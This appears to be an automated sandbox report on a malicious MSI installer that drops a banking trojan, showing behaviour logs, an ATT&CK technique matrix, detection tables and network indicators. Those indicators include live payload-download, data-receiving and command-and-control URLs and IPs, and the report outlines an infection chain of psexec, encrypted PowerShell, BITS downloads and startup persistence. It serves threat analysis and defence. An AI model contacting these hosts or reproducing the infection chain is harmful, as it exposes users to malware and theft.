    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitsTransfer\Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0312~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Nvidia-59226\Nvidia-59226.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: 4_2_00AFA365 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00AFA365
    Source: C:\Windows\Installer\MSI2EE6.tmpCode function: 4_2_00B0EBA4 GetTimeZoneInformation,4_2_00B0EBA4
    Source: Nvidia-59226.exe, 0000000F.00000003.3127988025.0000000001C51000.00000004.00000020.00020000.00000000.sdmp, Nvidia-59226.exe, 0000000F.00000003.3127866479.0000000001C51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: es%\Windows Defender\MsMpeng.exe
    Source: Nvidia-59226.exe, 0000000F.00000003.3127866479.0000000001C3D000.00000004.00000020.00020000.00000000.sdmp, Nvidia-59226.exe, 0000000F.00000003.3127988025.0000000001C51000.00000004.00000020.00020000.00000000.sdmp, Nvidia-59226.exe, 0000000F.00000003.3127988025.0000000001C49000.00000004.00000020.00020000.00000000.sdmp, Nvidia-59226.exe, 0000000F.00000003.3127866479.0000000001C51000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
    Source: C:\Nvidia-59226\Nvidia-59226.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire Infrastructure1
    Replication Through Removable Media
    1
    Windows Management Instrumentation
    1
    DLL Side-Loading
    1
    Exploitation for Privilege Escalation
    1
    Disable or Modify Tools
    1
    Credential API Hooking
    2
    System Time Discovery
    Remote Services1
    Archive Collected Data
    1
    Ingress Tool Transfer
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    Native API
    1
    BITS Jobs
    1
    DLL Side-Loading
    11
    Deobfuscate/Decode Files or Information
    LSASS Memory11
    Peripheral Device Discovery
    Remote Desktop Protocol1
    Credential API Hooking
    11
    Encrypted Channel
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Command and Scripting Interpreter
    2
    Registry Run Keys / Startup Folder
    11
    Process Injection
    2
    Obfuscated Files or Information
    Security Account Manager2
    File and Directory Discovery
    SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts4
    PowerShell
    1
    Services File Permissions Weakness
    2
    Registry Run Keys / Startup Folder
    1
    Software Packing
    NTDS143
    System Information Discovery
    Distributed Component Object ModelInput Capture14
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
    Services File Permissions Weakness
    1
    DLL Side-Loading
    LSA Secrets251
    Security Software Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    File Deletion
    Cached Domain Credentials41
    Virtualization/Sandbox Evasion
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items132
    Masquerading
    DCSync2
    Process Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
    Virtualization/Sandbox Evasion
    Proc Filesystem1
    Application Window Discovery
    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
    BITS Jobs
    /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
    Process Injection
    Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
    Services File Permissions Weakness
    Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578854 Sample: cB1ItKbbhY.msi Startdate: 20/12/2024 Architecture: WINDOWS Score: 100 65 site.webmailcontabilidadecrx.net 2->65 71 Malicious sample detected (through community Yara rule) 2->71 73 Multi AV Scanner detection for dropped file 2->73 75 Multi AV Scanner detection for submitted file 2->75 77 10 other signatures 2->77 10 msiexec.exe 17 41 2->10         started        14 Nvidia-59226.exe 2->14         started        16 svchost.exe 1 1 2->16         started        19 msiexec.exe 4 2->19         started        signatures3 process4 dnsIp5 45 C:\Windows\Installer\MSI2EE6.tmp, PE32 10->45 dropped 47 C:\Windows\Installer\MSI2A6F.tmp, PE32 10->47 dropped 49 C:\Windows\Installer\MSI2A10.tmp, PE32 10->49 dropped 51 7 other malicious files 10->51 dropped 83 Drops executables to the windows directory (C:\Windows) and starts them 10->83 21 MSI2EE6.tmp 3 10->21         started        23 msiexec.exe 8 10->23         started        85 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 14->85 59 site.webmailcontabilidadecrx.net 34.95.215.169, 443, 49723, 49725 GOOGLEUS United States 16->59 61 127.0.0.1 unknown unknown 16->61 file6 signatures7 process8 file9 26 psexec.exe 3 21->26         started        43 C:\Users\user\AppData\Local\Temp\psexec.exe, PE32 23->43 dropped process10 signatures11 79 Malicious encrypted Powershell command line found 26->79 81 Encrypted powershell cmdline option found 26->81 29 powershell.exe 46 26->29         started        process12 file13 53 C:53vidia-59226\play.exe, PE32 29->53 dropped 55 C:55vidia-5922655vidia-59226.exe (copy), PE32 29->55 dropped 57 C:\Users\user\AppData\...57vidia-59226.lnk, MS 29->57 dropped 87 Powershell uses Background Intelligent Transfer Service (BITS) 29->87 89 Found suspicious powershell code related to unpacking or dynamic code loading 29->89 91 Loading BitLocker PowerShell Module 29->91 93 Powershell drops PE file 29->93 33 Nvidia-59226.exe 1 29->33         started        37 WmiPrvSE.exe 1 29->37         started        39 conhost.exe 29->39         started        41 2 other processes 29->41 signatures14 process15 dnsIp16 63 23.94.207.151, 49787, 80 AS-COLOCROSSINGUS United States 33->63 67 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 33->67 69 Switches to a custom stack to bypass stack traces 33->69 signatures17

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    cB1ItKbbhY.msi24%ReversingLabs
    cB1ItKbbhY.msi8%VirustotalBrowse
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\psexec.exe100%Joe Sandbox ML
    C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exe100%Joe Sandbox ML
    C:\Nvidia-59226\Nvidia-59226.exe (copy)24%ReversingLabsWin32.Trojan.Ousaban
    C:\Nvidia-59226\play.exe24%ReversingLabsWin32.Trojan.Ousaban
    C:\Program Files (x86)\Dasmei support\App Dasmei installer\.bkp4%ReversingLabs
    C:\Program Files (x86)\Dasmei support\App Dasmei installer\dummy_app.exe0%ReversingLabs
    C:\Program Files (x86)\Dasmei support\App Dasmei installer\psexec.exe26%ReversingLabs
    C:\Users\user\AppData\Local\Temp\psexec.exe26%ReversingLabs
    C:\Windows\Installer\MSI28E4.tmp0%ReversingLabs
    C:\Windows\Installer\MSI2971.tmp0%ReversingLabs
    C:\Windows\Installer\MSI29A1.tmp0%ReversingLabs
    C:\Windows\Installer\MSI29C1.tmp0%ReversingLabs
    C:\Windows\Installer\MSI2A10.tmp0%ReversingLabs
    C:\Windows\Installer\MSI2A6F.tmp0%ReversingLabs
    C:\Windows\Installer\MSI2EE6.tmp0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    site.webmailcontabilidadecrx.net
    34.95.215.169
    truefalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      https://site.webmailcontabilidadecrx.net/notafiscal/download/cat.zipfalse
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        http://www.microsoft.coEpowershell.exe, 00000006.00000002.4667136687.000001AC7BBB3000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.4647536706.000001AC10072000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000006.00000002.4592389072.000001AC00225000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://site.webmailcontabilidadecrx.net/svchost.exe, 0000000A.00000002.3667611038.00000207B2600000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.4592389072.000001AC00225000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000006.00000002.4592389072.000001AC00225000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://23.94.207.151/Nvidia-59226.exe, 0000000F.00000003.3129298416.0000000001C70000.00000004.00000020.00020000.00000000.sdmp, Nvidia-59226.exe, 0000000F.00000003.3128167457.0000000001C6D000.00000004.00000020.00020000.00000000.sdmp, Nvidia-59226.exe, 0000000F.00000003.3127591156.0000000001C6B000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.4592389072.000001AC00225000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://contoso.com/Licensepowershell.exe, 00000006.00000002.4647536706.000001AC10072000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://contoso.com/Iconpowershell.exe, 00000006.00000002.4647536706.000001AC10072000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://crl.microsoOpowershell.exe, 00000006.00000002.4663952431.000001AC7BA31000.00000004.00000020.00020000.00000000.sdmpfalse
                              unknown
                              https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000000A.00000003.2216112517.00000207B23C0000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.drfalse
                                high
                                http://crl.ver)svchost.exe, 0000000A.00000002.3667611038.00000207B2600000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  http://www.microsoft.powershell.exe, 00000006.00000002.4667551745.000001AC7BD30000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    http://www.indyproject.org/Nvidia-59226.exe, 00000012.00000003.2647445335.00000000056F0000.00000004.00001000.00020000.00000000.sdmp, Nvidia-59226.exe, 00000012.00000002.2651388634.000000000202B000.00000040.10000000.00040000.00000000.sdmpfalse
                                      high
                                      https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.4592389072.000001AC00225000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://Dasmei-security.com/updateWindowsTypeNT60DisplayPROMPTROLLBACKCOSTPAppsShutdownOptionAllLIMIcB1ItKbbhY.msifalse
                                          unknown
                                          https://site.webmailcontabilidadecrx.net/notafiscal/receive_info.phppowershell.exe, 00000006.00000002.4592389072.000001AC00225000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            https://g.live.com/odclientsettings/Prod1C:edb.log.10.drfalse
                                              high
                                              https://site.webmailcontabilidadecrx.net:443/notafiscal/download/cat.zipsvchost.exe, 0000000A.00000002.3667961922.00000207B2662000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.3667961922.00000207B26B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.4592389072.000001AC00225000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://contoso.com/powershell.exe, 00000006.00000002.4647536706.000001AC10072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.4647536706.000001AC10072000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://23.94.207.151/lNvidia-59226.exe, 0000000F.00000003.3129298416.0000000001C70000.00000004.00000020.00020000.00000000.sdmp, Nvidia-59226.exe, 0000000F.00000003.3128167457.0000000001C6D000.00000004.00000020.00020000.00000000.sdmp, Nvidia-59226.exe, 0000000F.00000003.3127591156.0000000001C6B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://aka.ms/pscore68powershell.exe, 00000006.00000002.4592389072.000001AC00001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://Dasmei-security.com/supportButtonText_Yes&SimARPCOMMENTSAcB1ItKbbhY.msifalse
                                                            unknown
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.4592389072.000001AC00001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://23.94.207.151/avs_pro/index.phpNvidia-59226.exe, 0000000F.00000003.3127866479.0000000001C3D000.00000004.00000020.00020000.00000000.sdmp, Nvidia-59226.exe, 0000000F.00000003.3127988025.0000000001C49000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                23.94.207.151
                                                                unknownUnited States
                                                                36352AS-COLOCROSSINGUSfalse
                                                                34.95.215.169
                                                                site.webmailcontabilidadecrx.netUnited States
                                                                15169GOOGLEUSfalse
                                                                IP
                                                                127.0.0.1
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1578854
                                                                Start date and time:2024-12-20 15:42:10 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 10m 5s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:19
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:cB1ItKbbhY.msi
                                                                renamed because original name is a hash value
                                                                Original Sample Name:145a0149bc4d8a21d43bf013097c3d9d2a2db07c84fd52f80168ed898e22f5ae.msi
                                                                Detection:MAL
                                                                Classification:mal100.bank.evad.winMSI@20/41@1/3
                                                                EGA Information:
                                                                • Successful, ratio: 66.7%
                                                                HCA Information:
                                                                • Successful, ratio: 68%
                                                                • Number of executed functions: 20
                                                                • Number of non-executed functions: 137
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .msi
                                                                • Override analysis time to 240s for powershell
                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.109.210.53
                                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Execution Graph export aborted for target psexec.exe, PID 4864 because it is empty
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                TimeTypeDescription
                                                                09:43:07API Interceptor9494190x Sleep call for process: powershell.exe modified
                                                                09:43:12API Interceptor3x Sleep call for process: svchost.exe modified
                                                                09:43:43API Interceptor7221x Sleep call for process: Nvidia-59226.exe modified
                                                                15:43:42AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Nvidia-59226.lnk
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                23.94.207.151tTdMHr6SlJ.dllGet hashmaliciousUnknownBrowse
                                                                • 23.94.207.151/avs_coin/index.php
                                                                e5mIhMkcj5.exeGet hashmaliciousUnknownBrowse
                                                                • 23.94.207.151/avs_pro/index.php
                                                                PVKDyWHOaX.exeGet hashmaliciousUnknownBrowse
                                                                • 23.94.207.151/avs_pro/index.php
                                                                RcFBMph6zu.exeGet hashmaliciousUnknownBrowse
                                                                • 23.94.207.151/avs_pro/index.php
                                                                tTdMHr6SlJ.dllGet hashmaliciousUnknownBrowse
                                                                • 23.94.207.151/avs_coin/index.php
                                                                e5mIhMkcj5.exeGet hashmaliciousUnknownBrowse
                                                                • 23.94.207.151/avs_pro/index.php
                                                                No context
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                AS-COLOCROSSINGUStTdMHr6SlJ.dllGet hashmaliciousUnknownBrowse
                                                                • 23.94.207.151
                                                                e5mIhMkcj5.exeGet hashmaliciousUnknownBrowse
                                                                • 23.94.207.151
                                                                PVKDyWHOaX.exeGet hashmaliciousUnknownBrowse
                                                                • 23.94.207.151
                                                                RcFBMph6zu.exeGet hashmaliciousUnknownBrowse
                                                                • 23.94.207.151
                                                                tTdMHr6SlJ.dllGet hashmaliciousUnknownBrowse
                                                                • 23.94.207.151
                                                                e5mIhMkcj5.exeGet hashmaliciousUnknownBrowse
                                                                • 23.94.207.151
                                                                arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                • 107.174.209.17
                                                                uctgkfb7.exeGet hashmaliciousXWormBrowse
                                                                • 192.210.175.202
                                                                file.exeGet hashmaliciousRemcosBrowse
                                                                • 107.173.4.16
                                                                SwiftCopy_PaymtRecpt121228.exeGet hashmaliciousRemcosBrowse
